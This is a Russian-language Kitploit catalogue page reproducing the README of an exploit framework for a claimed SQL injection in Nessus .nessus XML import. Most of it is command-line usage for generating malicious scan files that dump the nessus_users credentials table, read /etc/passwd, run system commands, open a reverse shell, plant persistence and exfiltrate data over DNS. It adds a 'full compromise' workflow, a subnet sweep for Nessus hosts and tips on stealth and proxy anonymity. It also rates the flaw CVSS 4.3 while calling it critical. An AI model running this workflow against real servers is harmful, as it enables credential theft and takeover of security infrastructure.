Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPost-ExploitationPenetration TestingCommand and ControlRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Database Security
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

PoC for CVE-2026-57588 - SQL injection in Nessus 10.12.0 XML import. Generates malicious .nessus files to enumerate databases, exfiltrate credentials, and test time-based blind injection. For authorized security research. Author: Sudeepa Wanigarathna. Patched in 10.12.1.

Репозиторий
11 месяц назадЕщё не проверено
Поделиться

🛡️ CVE-2026-57588 - Фреймворк эксплуатации SQL-инъекции Nessus

Security Research CVE Version Python License


📋 Содержание

  • Обзор
  • Детали уязвимости
  • Возможности
  • Установка
  • Быстрый старт
  • Примеры использования
  • Типы пейлоадов
  • Расширенные сценарии
  • Отчетность
  • Устранение неполадок
  • Соображения безопасности
  • Лицензия

🔍 Обзор

CVE-2026-57588 — критическая уязвимость SQL-инъекции, обнаруженная в Tenable Nessus версий 10.12.0 и более ранних. Уязвимость находится в механизме разбора XML при импорте файлов результатов сканирования .nessus, позволяя аутентифицированным пользователям с правами импорта выполнять произвольные SQL-запросы к бэкенд-базе данных PostgreSQL.


⚠️ Детали уязвимости

🔬 Технические детали

Уязвимость существует из-за недостаточной санитизации значений XML-тегов перед их включением в SQL-запросы в процессе импорта. Злоумышленник может создать файл .nessus, содержащий специально сформированные пейлоады SQL-инъекций в таких XML-тегах, как:

  • hostname
  • fqdn
  • os
  • system-type
  • mac-address
  • netbios-name

Когда привилегированный пользователь импортирует вредоносный файл, несанитизированные значения выполняются против бэкенда PostgreSQL, что позволяет:

  • Перечисление базы данных
  • Извлечение данных
  • Выполнение команд
  • Доступ к файловой системе
  • Установка персистентности

✨ Возможности

Нажмите, чтобы развернуть список возможностей

🎯 Управление пейлоадами

  • 13+ типов пейлоадов, классифицированных по назначению
  • Шаблонная генерация пейлоадов
  • Создание и валидация пользовательских пейлоадов
  • Валидация параметров и проверка синтаксиса
  • Проверка синтаксиса SQL

🚀 Возможности эксплуатации

  • Многоэтапная эксплуатация с параллельным выполнением
  • Снятие отпечатков и перечисление базы данных
  • Извлечение данных с настраиваемым выбором таблиц/столбцов
  • Выполнение команд на целевой системе
  • Доступ к файловой системе и чтение файлов
  • Обратная оболочка с интерактивной сессией
  • Механизмы установки персистентности
  • Слепая SQL-инъекция на основе времени
  • Слепая SQL-инъекция на основе булевых значений
  • SQL-инъекция на основе ошибок
  • Стековые запросы для продвинутой эксплуатации
  • Внеполосное извлечение данных через DNS

📊 Отчетность и логирование

  • HTML-отчеты с профессиональным стилем
  • Markdown-отчеты для документации
  • JSON-отчеты для автоматизации
  • Текстовые отчеты для быстрого просмотра
  • Ротация логов с несколькими уровнями
  • Детальная статистика выполнения
  • Хеширование файлов для проверки целостности

📦 Установка

🐍 Предварительные требования

  • Python 3.7 или выше
  • pip (менеджер пакетов Python)
  • Git (опционально, для клонирования)

🔧 Быстрая установка

root@kitploit:~
# Клонировать репозиторий
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Создать и активировать виртуальное окружение
python3 -m venv venv
source venv/bin/activate  # На Windows: venv\Scripts\activate

# Установить зависимости
pip install -r requirements.txt

# Проверить установку
python3 exploit.py --version

🐳 Установка через Docker

root@kitploit:~
# Собрать Docker-образ
docker build -t nessus-exploit .

# Запустить инструмент
docker run -it --rm nessus-exploit generate -u https://test.com -p enum

📦 Установка пакета

root@kitploit:~
# Установить как пакет
pip install -e .

# Теперь можно запускать из любой директории
nessus-exploit generate -u https://test.com -p enum

🚀 Быстрый старт

Базовое использование

root@kitploit:~
# Сгенерировать базовый эксплойт для перечисления
python3 exploit.py generate -u https://test.com -p enum

# Сгенерировать продвинутый многоэтапный эксплойт
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus

# Извлечь данные из базы данных
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

Справка по командам

root@kitploit:~
# Показать общую справку
python3 exploit.py --help

# Показать справку по команде generate
python3 exploit.py generate --help

# Список всех доступных пейлоадов
python3 exploit.py list

💡 Примеры использования

1. Базовое перечисление

root@kitploit:~
python3 exploit.py generate -u https://test.com -p enum
Ожидаемый вывод
root@kitploit:~
[2026-07-22 10:15:23] [INFO] [*] Начало эксплуатации против https://test.com
[2026-07-22 10:15:23] [INFO] [*] Сессия: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] Пейлоад: enum
[2026-07-22 10:15:23] [INFO] [*] Выполнение этапа: fingerprint
[2026-07-22 10:15:24] [INFO] [+] Сгенерирован XML: exploit_20260722_fingerprint_101523.nessus (3847 байт)
[2026-07-22 10:15:24] [INFO] [*] Выполнение этапа: schema_dump
[2026-07-22 10:15:25] [INFO] [+] Сгенерирован XML: exploit_20260722_schema_dump_101524.nessus (4213 байт)
[2026-07-22 10:15:25] [INFO] [+] Эксплуатация завершена! Длительность: 2.15с

============================================================
СВОДКА ЭКСПЛУАТАЦИИ
============================================================
Цель: https://test.com
Статус: УСПЕХ
Длительность: 2.15с
Сгенерировано файлов: 3
Сгенерировано отчетов: 3
============================================================

2. Продвинутая многоэтапная эксплуатация

root@kitploit:~
python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v

3. Извлечение данных

root@kitploit:~
# Извлечь учетные данные пользователей
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# Извлечь с пользовательскими столбцами
python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status

4. Обратная оболочка

root@kitploit:~
# Запустить слушатель и сгенерировать эксплойт
python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus

5. Выполнение команд

root@kitploit:~
# Выполнить базовые команды
python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"

# Выполнить сложные команды
python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"

6. Чтение файлов

root@kitploit:~
# Чтение системных файлов
python3 exploit.py generate -u https://test.com -p file -f /etc/passwd

# Чтение логов приложения
python3 exploit.py generate -u https://test.com -p file -f /var/log/nessus/nessusd.log

7. Слепая инъекция на основе времени

root@kitploit:~
# Задержка 5 секунд
python3 exploit.py generate -u https://test.com -p sleep -s 5

# Задержка 30 секунд для тяжелых тестов
python3 exploit.py generate -u https://test.com -p sleep -s 30

8. С поддержкой прокси

root@kitploit:~
# HTTP прокси
python3 exploit.py generate -u https://test.com -p advanced --proxy http://127.0.0.1:8080

# HTTPS прокси с аутентификацией
python3 exploit.py generate -u https://test.com -p advanced --proxy https://user:[email protected]:8080

9. Параллельное выполнение

root@kitploit:~
# Запустить с 8 параллельными задачами
python3 exploit.py generate -u https://test.com -p advanced --jobs 8

# С пользовательским тайм-аутом и повторными попытками
python3 exploit.py generate -u https://test.com -p advanced --jobs 4 --timeout 60 --retries 5

10. Подробный и тихий режимы

root@kitploit:~
# Подробный режим (детальный вывод)
python3 exploit.py generate -u https://test.com -p advanced -v --log-file debug.log

# Тихий режим (минимальный вывод)
python3 exploit.py generate -u https://test.com -p advanced -q

📚 Типы пейлоадов

Категория: FINGERPRINTING

ПейлоадОписаниеПараметры
fingerprintСнятие отпечатков базы данныхНет

Категория: UNION

ПейлоадОписаниеПараметры
schema_dumpДамп схемы базы данныхНет
data_exfilИзвлечение данных таблицыtable, columns

Категория: TIMING

ПейлоадОписаниеПараметры
time_basedСлепая инъекция на основе времениdelay
boolean_blindСлепая на основе булевых значенийcondition,

Категория: FILE_ACCESS

ПейлоадОписаниеПараметры
file_readЧтение системных файловpath, offset, length

Категория: COMMAND_EXEC

ПейлоадОписаниеПараметры
command_execВыполнение системных командcommand

Категория: REVERSE_SHELL

ПейлоадОписаниеПараметры
reverse_shellУстановка обратной оболочкиhost, port

Категория: PERSISTENCE

ПейлоадОписаниеПараметры
persistenceУстановка персистентностиНет

Категория: ERROR_BASED

ПейлоадОписаниеПараметры
error_basedИнъекция на основе ошибокquery

Категория: STACKED

ПейлоадОписаниеПараметры
stacked_queriesСтековые запросыquery

Категория: OUT_OF_BAND

ПейлоадОписаниеПараметры
oob_dnsDNS-эксфильтрацияhost, data

🎯 Расширенные сценарии

Сценарий 1: Полный рабочий процесс компрометации

root@kitploit:~
# Шаг 1: Перечислить базу данных
python3 exploit.py generate -u https://test.com -p enum -v

# Шаг 2: Извлечь конфиденциальные данные
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# Шаг 3: Установить персистентность
python3 exploit.py generate -u https://test.com -p persist

# Шаг 4: Настроить обратную оболочку
python3 exploit.py generate -u https://test.com -p shell -lp 4444

Сценарий 2: Скрытные операции

root@kitploit:~
# Использование прокси и тихого режима
python3 exploit.py generate -u https://test.com -p advanced \
    --proxy http://127.0.0.1:8080 \
    --no-ssl-verify \
    -q \
    -o stealth_scan.nessus

Сценарий 3: Автоматизированный конвейер тестирования

root@kitploit:~
#!/bin/bash
# auto_exploit.sh - Автоматизированный скрипт эксплуатации

TARGET="https://test.com"
OUTPUT_DIR="./results_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT_DIR

# Запустить все пейлоады
for payload in enum dump shell persist; do
    echo "[*] Выполнение пейлоада: $payload"
    python3 exploit.py generate -u $TARGET -p $payload -o "$OUTPUT_DIR/${payload}_scan.nessus" -q
done

# Сгенерировать комплексный отчет
python3 exploit.py report -i "$OUTPUT_DIR" -o "$OUTPUT_DIR/final_report"

Сценарий 4: Оценка безопасности предприятия

root@kitploit:~
# Оценка по всей сети
for target in $(nmap -p 8834 --open 192.168.1.0/24 | grep "Nessus" | awk '{print $5}'); do
    echo "[*] Тестирование: $target"
    python3 exploit.py generate -u "https://$target" -p advanced -o "scan_${target}.nessus" -q
done

Сценарий 5: Сбор доказательств

root@kitploit:~
# Собрать комплексные доказательства
python3 exploit.py generate -u https://test.com -p advanced \
    --file /etc/hosts \
    --command "systemctl status nessusd" \
    --table nessus_users \
    --columns username,password_hash,email,last_login \
    -v \
    --log-file evidence.log

📊 Отчетность

Доступные форматы отчетов

Создание отчетов

root@kitploit:~
# Создать все форматы отчетов
python3 exploit.py report -i results.json -o report

# Создать только HTML-отчет
python3 exploit.py report -i results.json -o report.html --format html

# Создать Markdown-отчет
python3 exploit.py report -i results.json -o report.md --format markdown

Содержимое отчета

  • Информация о цели
  • ID сессии и тип пейлоада
  • Статистика выполнения
  • Список сгенерированных файлов
  • Хеши файлов для целостности
  • Логи ошибок (если есть)
  • Отказ от ответственности и предупреждения

🔧 Устранение неполадок

Частые проблемы и решения

Проблема 1: Ошибки соединения
root@kitploit:~
# Ошибка: Соединение отклонено
# Решение: Проверить, запущен ли Nessus и доступен ли порт
python3 exploit.py generate -u https://test.com:8834 -p enum

# Ошибка: Не удалось проверить SSL-сертификат
# Решение: Отключить проверку SSL
python3 exploit.py generate -u https://test.com -p enum --no-ssl-verify
Проблема 2: Ошибки валидации XML
root@kitploit:~
# Ошибка: Неверная структура XML
# Решение: Отключить валидацию XML
python3 exploit.py generate -u https://test.com -p enum --no-validate
Проблема 3: Ошибки пейлоадов
root@kitploit:~
# Ошибка: Отсутствует обязательный параметр
# Решение: Проверить требования пейлоада
python3 exploit.py validate -p command_exec

# Затем указать необходимые параметры
python3 exploit.py generate -u https://test.com -p exec --command "whoami"
Проблема 4: Отказано в доступе
root@kitploit:~
# Ошибка: Невозможно записать файлы
# Решение: Проверить права на директорию
chmod 755 ./outputs/
python3 exploit.py generate -u https://test.com -p enum -o ./outputs/scan.nessus
Проблема 5: Проблемы с тайм-аутом
root@kitploit:~
# Ошибка: Операция превысила тайм-аут
# Решение: Увеличить тайм-аут
python3 exploit.py generate -u https://test.com -p advanced --timeout 120

# Или использовать повторные попытки
python3 exploit.py generate -u https://test.com -p advanced --retries 5

🔐 Соображения безопасности

⚠️ Важные предупреждения

  1. Соблюдение закона: Используйте только на системах, которые вам принадлежат, или при наличии явного письменного разрешения на тестирование
  2. Защита данных: Обращайтесь с извлеченными учетными данными и данными с особой осторожностью
  3. Изолированная среда: Всегда тестируйте в изолированных лабораторных средах
  4. Резервное копирование: Всегда делайте резервные копии баз данных перед тестированием
  5. Восстановление: Восстанавливайте системы в исходное состояние после тестирования
  6. Документация: Документируйте все действия по тестированию для соблюдения требований

✅ Лучшие практики

  1. Используйте выделенные тестовые учетные записи
  2. Ведите подробные журналы всех действий
  3. Используйте VPN/прокси для анонимности при тестировании сторонних систем
  4. Следуйте правилам ответственного раскрытия информации
  5. Обучите свою команду об этой уязвимости

📝 Лицензия

Этот проект лицензирован по лицензии MIT - подробности см. в файле LICENSE.


🤝 Внесение вклада

Вклад приветствуется! Не стесняйтесь отправлять Pull Request.

Настройка разработки

root@kitploit:~
# Клонировать репозиторий
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Установить зависимости для разработки
pip install -r requirements-dev.txt

# Запустить тесты
pytest

# Форматировать код
black exploit.py

# Проверить стиль кода
flake8 exploit.py

📞 Поддержка

Документация

  • Официальное уведомление безопасности Tenable
  • Запись в базе данных CVE
  • Документация Nessus

Контакты

  • Автор: Sudeepa Wanigarathna
  • Электронная почта: [email protected]
  • GitHub: CerberusMrXi

📄 Журнал изменений

Версия 1.0.0 (2026-07-22)

Первый выпуск

  • ✅ Комплексный фреймворк эксплуатации
  • ✅ 13 типов пейлоадов, классифицированных по назначению
  • ✅ Многоэтапная эксплуатация с параллельным выполнением
  • ✅ Валидация XML и проверка схемы
  • ✅ Несколько форматов отчетов (HTML, Markdown, JSON, Text)
  • ✅ Автоматическое хеширование файлов и проверка целостности
  • ✅ Профессиональное логирование с ротацией
  • ✅ Поддержка прокси для скрытных операций
  • ✅ Обратная оболочка с интерактивной сессией
  • ✅ Механизмы персистентности
  • ✅ Выполнение команд и чтение файлов
  • ✅ Слепая инъекция на основе времени и булевых значений
  • ✅ Инъекция на основе ошибок и стековых запросов
  • ✅ Внеполосная DNS-эксфильтрация
  • ✅ Поддержка Docker
  • ✅ Кроссплатформенная совместимость

⬆ Наверх


⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Этот инструмент предназначен ТОЛЬКО для ОБРАЗОВАТЕЛЬНОГО и АВТОРИЗОВАННОГО тестирования безопасности. Несанкционированное использование является НЕЗАКОННЫМ. Автор НЕ НЕСЕТ ОТВЕТСТВЕННОСТИ за неправильное использование.

Скачать инструмент
ПараметрЗначение
CVE IDCVE-2026-57588
Тип уязвимостиSQL-инъекция
Затронутые продуктыTenable Nessus 10.12.0 и более ранние
Исправленная версияNessus 10.12.1 и новее
Оценка CVSS4.3 (Средняя)
Вектор атакиСеть
Сложность атакиНизкая
Необходимые привилегииАутентифицированный (права импорта)
Взаимодействие пользователяТребуется (социальная инженерия)
ВоздействиеИзвлечение данных, удаленное выполнение кода

🛠️ Расширенные возможности

  • Параллельное выполнение с настраиваемым числом задач
  • Поддержка прокси для скрытных операций
  • Обработка сертификатов SSL/TLS
  • Валидация XML и проверка схемы
  • Интерактивный режим для живой эксплуатации
  • Механизм повторных попыток для надежности
  • Настройка тайм-аута для медленных соединений

📦 Профессиональный инструментарий

  • Структура CLI на основе подкоманд
  • Подробный и тихий режимы
  • Цветной вывод в терминале
  • Индикаторы прогресса для длительных задач
  • Поддержка Docker для контейнеризированного тестирования
  • Кроссплатформенная совместимость (Linux, Windows, macOS)
delay
ФорматОписаниеИспользование
HTMLПрофессиональный HTML-отчет со стилями--format html
MarkdownФормат Markdown для документации--format markdown
JSONJSON для автоматизации--format json
TextОбычный текст для быстрого просмотра--format text